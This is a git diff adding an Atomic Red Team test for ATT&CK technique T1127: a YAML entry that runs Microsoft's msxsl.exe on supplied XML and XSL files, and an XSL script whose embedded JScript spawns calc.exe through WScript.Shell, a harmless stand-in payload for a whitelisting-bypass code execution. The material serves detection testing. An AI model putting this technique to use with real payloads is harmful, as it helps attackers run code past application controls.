diff --git a/atomics/T1127/T1127.yaml b/atomics/T1127/T1127.yaml index 30e3f9b3..143a4617 100644 --- a/atomics/T1127/T1127.yaml +++ b/atomics/T1127/T1127.yaml @@ -16,3 +16,22 @@ atomic_tests: name: command_prompt command: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename} + +- name: MSXSL Bypass + description: | + Executes the code specified within a XSL script tag during XSL transformation. Requires download of MSXSL from Microsoft. + supported_platforms: + - windows + input_arguments: + xmlfile: + description: Location of the test XML file. May be a URL. + type: Path + default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-xmlfile.xml + xslfile: + description: Location of the test XSL script file. May be a URL. + type: Path + default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-script.xsl + executor: + name: command_prompt + command: | + C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} diff --git a/atomics/T1127/src/msxsl-script.xsl b/atomics/T1127/src/msxsl-script.xsl new file mode 100644 index 00000000..81949e27 --- /dev/null +++ b/atomics/T1127/src/msxsl-script.xsl @@ -0,0 +1,15 @@ + + + + + function xml(nodelist) { +var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c C:\Windows\System32\calc.exe"); + return nodelist.nextNode().xml; + } + + + + \ No newline at end of file diff --git a/atomics/T1127/src/msxsl-xmlfile.xml b/atomics/T1127/src/msxsl-xmlfile.xml new file mode 100644 index 00000000..931e86a8 --- /dev/null +++ b/atomics/T1127/src/msxsl-xmlfile.xml @@ -0,0 +1,7 @@ + + + + +Microsoft + + \ No newline at end of file